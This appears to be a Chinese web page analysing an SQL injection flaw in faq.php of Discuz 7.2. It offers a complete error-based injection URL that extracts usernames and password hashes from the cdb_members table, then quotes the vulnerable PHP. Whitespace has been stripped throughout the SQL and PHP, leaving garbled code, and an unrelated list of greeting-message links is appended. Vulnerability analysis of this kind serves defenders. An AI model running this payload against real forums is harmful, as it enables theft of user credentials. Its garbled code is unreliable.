Discuz7.2版的faq.php SQL注入漏洞分析
注入代码实例:
https://www.nhooo.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)and(select1from(selectcount(*),concat((select(select(selectconcat(username,0x20,password)fromcdb_memberslimit0,1))from`information_schema`.tableslimit0,1),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23
漏洞分析:byphithon
($action=='grouppermission'){
... ksort($gids); $groupids=array(); foreach($gidsas$row){ $groupids[]=$row[0]; }
$query=$db->query("SELECT*FROM{$tablepre}usergroupsuLEFTJOIN{$tablepre}admingroupsaONu.groupid=a.admingidWHEREu.groupidIN(".implodeids($groupids).")"); ... } functionimplodeids($array){ if(!empty($array)){ return"'".implode("','",is_array($array)?$array:array($array))."'"; }else{ return''; } }
热门推荐
10 对患者生日祝福语简短
11 结婚祝福语简短装备
12 周岁祝福语学生文案简短
13 订婚领证祝福语简短精辟
14 导师获奖祝福语大全简短
15 新婚购房祝福语简短精辟
16 牛年祝福语简短的爱人
17 送芒果的祝福语简短
18 送给学长毕业祝福语简短